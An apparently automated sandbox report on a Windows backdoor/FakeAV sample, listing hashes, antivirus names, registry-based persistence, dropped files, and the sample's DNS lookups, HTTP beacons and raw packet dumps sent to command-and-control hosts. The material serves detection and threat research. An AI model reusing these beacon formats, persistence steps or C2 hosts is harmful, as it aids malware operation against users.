Analysis Date2014-12-03 05:13:57
MD50d3226ce648e695ade084e653810191d
SHA112e0efa9094035e7dfcd0f146f16a3ef72e8a8f2

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 92739db3caaf5704bf749483e225ec0f sha1: e77b0c9eedc53efee00c64c9293da09e6e6021ea size: 67072
Section.rdata md5: be210c82da16553a74293f16b27fd7b7 sha1: 57e55a0b94ad1d823d3635569c5d90fa669ee4b1 size: 5120
Section.data md5: 5cb47b4f83b5d43c291f1b6e178e57a5 sha1: 64e0c0d5fb00b02e5c7a972b8b8b31b1fcbdef1b size: 35840
Section.rsrc md5: 0b169dfcdb129e7553d8256c6f157b53 sha1: 983d410d18c8f40ac9e6576fc3200dbc396e23c2 size: 1024
Timestamp2005-12-02 10:20:40
VersionLegalCopyright: Copyright (C) 2010
InternalName: c3
FileVersion: 1, 0, 0, 1
FileDescription: Desktop Window Manager
ProductVersion: 1, 0, 0, 1
PrivateBuild: 1100
OriginalFilename: c3.exe
PEhashf475af6425cec0ce96be9610b5adcef1d93a3482
IMPhash3ac75902f837e066223e1fb2da1ca70e
AV360 SafeGen:Heur.Conjar.2
AVAd-AwareGen:Heur.Conjar.2
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Packed.Krap.hy
AVAuthentiumW32/Goolbot.A.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Heur.Conjar.2
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-215376
AVDr. WebTrojan.Packed
AVEmsisoftGen:Heur.Conjar.2
AVEset (nod32)Win32/Kryptik.HPG
AVFortinetW32/Swisyn.AOE!tr
AVFrisk (f-prot)W32/Goolbot.A.gen!Eldorado
AVF-SecureGen:Heur.Conjar.2
AVGrisoft (avg)Win32/Cryptor
AVIkarusPacked.Win32.Krap
AVK7Backdoor ( 04c51d251 )
AVKasperskyPacked.Win32.Krap.hy
AVMalwareBytesTrojan.Agent.Gen
AVMcafeeBackDoor-EXI
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.2
AVNormanGen:Heur.Conjar.2
AVRising0x55af32f6
AVSophosTroj/FakeAV-BVU
AVSymantecTrojan.FakeAV!gen39
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS2.ctrl.konusevoz.cn
Winsock DNS127.0.0.1
Winsock DNS3.ctrl.konusevoz.cn
Winsock DNSkonusevoz.cn

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Network Details:

DNSkonusevoz.cn
Type: A
65.19.157.201
DNSprotectyourpc-11.com
Type: A
74.200.250.181
DNS3.ctrl.konusevoz.cn
Type: A
65.19.157.201
DNS2.ctrl.konusevoz.cn
Type: A
65.19.157.201
HTTP GEThttp://konusevoz.cn/g/r.php?q=%2BI0uFz1QqGX5nnpCMSGteqHdJBI8VKsHpt1VYE9XrQfUz2BSaRClchzHBBtcyP26
User-Agent:
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v29&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v29&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v29&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err073_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://3.ctrl.konusevoz.cn/gbot/ss.cgi?q=%2BI0uFz1QqD3y1CIcxwQbXMil6Q%3D%3D
User-Agent:
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v29&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err083&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v29&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err095_0_3&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v29&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v29&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err073_2_1&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://2.ctrl.konusevoz.cn/gbot/ss.cgi?q=%2BI0uFz1QqD3y1CEcxwQbXMil6Q%3D%3D
User-Agent:
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v29&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err083&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v29&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err095_1_2&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://konusevoz.cn/g/t.php?q=%2BI0uFz1QqGX5nnpCMSGteqHdJBI8VKsHpt1VYE9XrQfUz3AbPkbuJuPUIR8cxwQbXMj9ug%3D%3D
User-Agent:
HTTP GEThttp://konusevoz.cn/g/p.php?q=tTwvw20r0bjtf3GTYF7Xxep%2FAOETXdHFmG0vw21b1bHt4WSFynu7XGw%3D
User-Agent:
HTTP GEThttp://konusevoz.cn/g/ii.php
User-Agent:
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v29&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err093_56_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 65.19.157.201:80
Flows TCP192.168.1.1:1032 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1033 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1034 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1035 ➝ 65.19.157.201:80
Flows TCP192.168.1.1:1036 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1037 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1038 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1039 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1040 ➝ 65.19.157.201:80
Flows TCP192.168.1.1:1041 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1042 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1043 ➝ 65.19.157.201:80
Flows TCP192.168.1.1:1044 ➝ 65.19.157.201:80
Flows TCP192.168.1.1:1045 ➝ 65.19.157.201:80
Flows TCP192.168.1.1:1046 ➝ 74.200.250.181:80

Raw Pcap
0x00000000 (00000)   47455420 2f672f72 2e706870 3f713d25   GET /g/r.php?q=%
0x00000010 (00016)   32424930 75467a31 51714758 356e6e70   2BI0uFz1QqGX5nnp
0x00000020 (00032)   434d5347 74657148 644a4249 38564b73   CMSGteqHdJBI8VKs
0x00000030 (00048)   48707431 56594539 58725166 557a3242   Hpt1VYE9XrQfUz2B
0x00000040 (00064)   53615243 6c63687a 48424274 63795032   SaRClchzHBBtcyP2
0x00000050 (00080)   36204854 54502f31 2e310d0a 436f6e6e   6 HTTP/1.1..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 206b6f6e 75736576 6f7a2e63   ost: konusevoz.c
0x00000080 (00128)   6e0d0a41 63636570 743a202a 2f2a0d0a   n..Accept: */*..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7632 39267379 7374656d   ype=g_v29&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7632 39267379 7374656d   ype=g_v29&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 385f325f   status=err088_2_
0x00000070 (00112)   30266e3d 30266578 7472613d 30204854   0&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7632 39267379 7374656d   ype=g_v29&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723037 335f325f   status=err073_2_
0x00000070 (00112)   30266e3d 30266578 7472613d 30204854   0&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f67626f 742f7373 2e636769   GET /gbot/ss.cgi
0x00000010 (00016)   3f713d25 32424930 75467a31 51714433   ?q=%2BI0uFz1QqD3
0x00000020 (00032)   79314349 63787751 62584d69 6c365125   y1CIcxwQbXMil6Q%
0x00000030 (00048)   33442533 44204854 54502f31 2e310d0a   3D%3D HTTP/1.1..
0x00000040 (00064)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000050 (00080)   650d0a48 6f73743a 20332e63 74726c2e   e..Host: 3.ctrl.
0x00000060 (00096)   6b6f6e75 7365766f 7a2e636e 0d0a4163   konusevoz.cn..Ac
0x00000070 (00112)   63657074 3a202a2f 2a0d0a0d 0a342047   cept: */*....4 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7632 39267379 7374656d   ype=g_v29&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 33266e3d   status=err083&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a 20746869 73207365   lose.... this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7632 39267379 7374656d   ype=g_v29&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f305f   status=err095_0_
0x00000070 (00112)   33266e3d 30266578 7472613d 30204854   3&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7632 39267379 7374656d   ype=g_v29&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 385f325f   status=err088_2_
0x00000070 (00112)   30266e3d 30266578 7472613d 30204854   0&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7632 39267379 7374656d   ype=g_v29&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723037 335f325f   status=err073_2_
0x00000070 (00112)   31266e3d 30266578 7472613d 30204854   1&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f67626f 742f7373 2e636769   GET /gbot/ss.cgi
0x00000010 (00016)   3f713d25 32424930 75467a31 51714433   ?q=%2BI0uFz1QqD3
0x00000020 (00032)   79314345 63787751 62584d69 6c365125   y1CEcxwQbXMil6Q%
0x00000030 (00048)   33442533 44204854 54502f31 2e310d0a   3D%3D HTTP/1.1..
0x00000040 (00064)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000050 (00080)   650d0a48 6f73743a 20322e63 74726c2e   e..Host: 2.ctrl.
0x00000060 (00096)   6b6f6e75 7365766f 7a2e636e 0d0a4163   konusevoz.cn..Ac
0x00000070 (00112)   63657074 3a202a2f 2a0d0a0d 0a372047   cept: */*....7 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7632 39267379 7374656d   ype=g_v29&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 33266e3d   status=err083&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
